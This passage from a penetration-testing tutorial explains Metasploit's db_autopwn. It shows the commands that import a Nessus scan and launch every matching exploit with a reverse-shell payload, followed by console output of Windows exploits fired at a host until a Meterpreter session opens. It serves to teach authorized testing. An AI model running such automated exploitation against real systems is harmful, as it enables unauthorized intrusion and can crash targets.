Let’s take a quick diversion into exploitation. Metasploit’s Autopwn tool automatically targets and exploits a system using an open port or using the results of a vulnerability scan export. You can use Autopwn to harness the results of most vulnerability scanners, including NeXpose, Nessus, and OpenVAS.
For example, here’s how we could use a Nessus results import to target a system and autopwn it. Create a new database with db_connect
and use db_import
to import the scan report. In the next example, we run db_autopwn
with a series of switches to launch attacks against all targets (e
), show all matching modules (t
), use a reverse shell payload (r
), select exploit modules based on vulnerability (x
), and also select based on open ports (p
). Once db_autopwn
launches, Metasploit begins launching exploits at the targets. Successful exploits return a shell to the attacking machine.
msf >db_connect postgres:[email protected]/msf3
msf >db_import /root/nessus.nbe
msf >db_autopwn -e -t -r -x -p
[*] (1/72
[0 sessions]): Launching exploit/windows/mssql/ms09_004_sp_replwritetovarbin against 192.168.33.130:1433... [*] (2/72 [0 sessions]): Launching exploit/windows/smb/ psexec against 192.168.33.130:445... [*] (3/72 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.33.130:445.... . . SNIP . . .
[*] Transmitting intermediate stager for over-sized stage...(216 bytes) [*] Sending stage (718336 bytes) [*] Meterpreter session1 opened
(192.168.1.101:40912 -> 192.168.1.115:15991) [*] (72/72 [1 sessions]): Waiting on 2 launched modules to finish execution... [*] (72/72 [1 sessions]): Waiting on 0 launched modules to finish execution...
Based on these scans, Autopwn launched 72 exploits and one was successful, as shown at . This exploit allows us full access to the machine with a Meterpreter console that will be discussed in far more depth in Chapter 6.
One big caveat to remember when using Autopwn: If you’re going in with your Autopwn guns blazing, the target system can crash or lose stability. Autopwn has useful features not covered here, such as the ability to select only exploits that have an “Excellent” ranking, meaning it is very unlikely they will crash the remote system or service. For more information on its usage, enter db_autopwn -h
.